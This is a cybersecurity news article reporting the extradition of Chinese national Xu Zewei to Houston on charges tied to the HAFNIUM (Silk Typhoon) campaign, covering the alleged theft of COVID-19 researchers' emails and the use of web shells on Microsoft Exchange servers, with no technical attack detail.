Chinese Silk Typhoon Hacker Extradited to the U.S. from Italy

A Chinese national, implicated in one of the most damaging state-sponsored hacking campaigns in recent history, has been extradited from Italy to the United States.

Xu Zewei, 34, a citizen of the People’s Republic of China, landed on U.S. soil this past weekend and appeared before U.S. District Court in Houston, Texas, on April 27, 2026.

He is facing a nine-count federal indictment covering a campaign of computer intrusions carried out between February 2020 and June 2021, a period that overlapped with the height of the COVID-19 pandemic and the rise of the widely known HAFNIUM hacking operation.

Xu’s alleged activities reach far beyond ordinary cybercrime. Court documents reveal that officers from China’s Ministry of State Security (MSS), specifically its Shanghai State Security Bureau (SSSB), directed Xu to carry out the intrusions.

At the time, Xu was employed by Shanghai Powerock Network Co. Ltd. (Powerock), a private Chinese technology firm that prosecutors describe as one of many “enabling” companies the Chinese government used to conceal its direct role in cyber operations.

This arrangement, where Beijing outsources espionage to contracted private businesses, has become a known pattern in Chinese state-sponsored cyber activity.

The U.S. Department of Justice (DOJ) identified that Xu’s alleged hacking activities formed a core part of the HAFNIUM campaign, the group now widely tracked across the cybersecurity industry under the name Silk Typhoon.

HAFNIUM is credited with compromising more than 12,700 U.S. organizations, hitting sectors ranging from academic institutions to legal services and government-adjacent entities.

FBI Cyber Division Assistant Director Brett Leatherman stated that the extradition shows the FBI’s reach extends well beyond U.S. borders, warning that others who conduct similar operations on behalf of China face the same risk of prosecution.

Starting in early 2020, Xu and his co-conspirators targeted U.S.-based universities, virologists, and immunologists conducting research into COVID-19 vaccines, treatments, and testing methods.

On or about February 19, 2020, Xu confirmed to an SSSB officer that he had successfully breached the network of a research university in the Southern District of Texas.

Days later, that officer directed Xu to access specific email accounts belonging to scientists engaged in COVID-19 research.

Xu later confirmed he extracted the full contents of those researchers’ mailboxes and reported his success back to his SSSB handlers.

His co-defendant, Zhang Yu, 44, also a PRC national, remains at large. Anyone with information on Zhang’s location is urged to contact the FBI at 1-800-CALL-FBI (1-800-225-5324).

The FBI’s Houston Field Office is leading the investigation, and the case is being prosecuted by Assistant U.S. Attorney Mark McIntyre and Deputy Chief Matthew Anzaldi of the National Security Division’s National Security Cyber Section.

Web Shell Deployment as a Persistence Tool

Beginning in late 2020, Xu and his co-conspirators shifted their focus to exploiting known vulnerabilities in Microsoft Exchange Server, a widely deployed enterprise email platform used by organizations around the world.

After gaining initial access, the group installed web shells on the compromised servers to maintain persistent remote access.

A web shell is a malicious script that lets an attacker control an infected server through a web browser, enabling repeated access without triggering a fresh intrusion alert.

The web shells used by Xu and his associates were specifically linked to HAFNIUM actors at that time, which allowed investigators to establish forensic attribution.

Victims in this phase included a second Texas university and a global law firm with offices in Washington, D.C.. Inside that law firm’s systems, the group searched mailboxes using keywords like “Chinese sources,” “MSS,” and “HongKong,” pointing to a focused intelligence-collection goal rather than financial theft alone.

In April 2021, the Justice Department conducted a court-authorized operation to remove hundreds of lingering web shells from vulnerable U.S. systems.

By July 2021, the United States and allied nations formally attributed the full HAFNIUM campaign to China’s MSS.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.